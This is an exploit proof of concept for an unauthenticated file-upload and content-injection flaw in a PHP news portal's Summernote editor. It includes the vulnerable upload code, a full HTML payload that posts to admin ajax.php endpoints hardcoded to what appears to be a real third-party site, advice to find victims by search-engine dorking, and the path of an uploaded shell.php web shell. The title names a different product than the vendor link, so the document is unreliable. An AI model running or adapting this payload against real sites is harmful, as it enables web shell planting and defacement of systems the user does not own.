=============================================================================================================================================
| # Title     : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] infected item : admin_class.php

		$data .= ", content = '".htmlentities(str_replace("'","’",$content))."' ";
		if(!empty($_FILES['cover']['tmp_name'])){
			$fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));
			$move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);
			$protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';
			$hostName = $_SERVER['HTTP_HOST'];
			$path =explode('/',$_SERVER['PHP_SELF']);
			$currentPath = '/'.$path[1]; 
			if($move){
						$data .= ", cover_img='$fname' ";
			}
		}
	
[+] Line 27 : Set your target url.

[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.


[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Manage About Page</title>
    <!-- Include Summernote CSS and jQuery -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script>
</head>
<body>
    <div class="container mt-5">
        <div class="col-lg-12">
            <div class="card card-outline card-primary">
                <div class="card-body">
                    <form action="" id="manage-about">
                        <div class="form-group">
                            <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">
                                <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>
                            </textarea>
                        </div>
                    </form>
                </div>
                <div class="card-footer border-top border-info">
                    <div class="d-flex w-100 justify-content-center align-items-center">
                        <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script>
        $(document).ready(function(){
            // Initialize Summernote Editor
            $('.summernote2').summernote({
                height: 300,
                toolbar: [
                    ['style', ['style']],
                    ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],
                    ['fontname', ['fontname']],
                    ['fontsize', ['fontsize']],
                    ['color', ['color']],
                    ['para', ['ol', 'ul', 'paragraph', 'height']],
                    ['table', ['table']],
                    ['insert', ['link', 'picture']],
                    ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]
                ],
                callbacks: {
                    onImageUpload: function(files) {
                        saveImg(files[0]);  // Handle image upload
                    }
                }
            });

            // Function to save uploaded image
            function saveImg(_file) {
                var data = new FormData();
                data.append("file", _file);
                $.ajax({
                    data: data,
                    type: "POST",
                    url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",
                    cache: false,
                    contentType: false,
                    processData: false,
                    success: function(resp) {
                        var image = $('<img>').attr('src', resp);
                        $('.summernote2').summernote("insertNode", image[0]);
                    }
                });
            }
        });

        // Form Submission
        $('#manage-about').submit(function(e) {
            e.preventDefault();
            start_load();  // Start a loading indicator (you need to define this function)
            $.ajax({
                url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',
                data: new FormData($(this)[0]),
                cache: false,
                contentType: false,
                processData: false,
                method: 'POST',
                type: 'POST',
                success: function(resp) {
                    if(resp == 1) {
                        alert_toast('Data successfully saved', "success");
                        end_load();  // End the loading indicator (you need to define this function)
                    }
                }
            });
        });

        // Optional: Define start_load and end_load functions
        function start_load() {
            // Add your loading indicator logic here
        }

        function end_load() {
            // Remove your loading indicator logic here
        }

        function alert_toast(message, type) {
            alert(message); // Basic alert. Replace with a better toast notification if needed.
        }
    </script>
</body>
</html>


[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================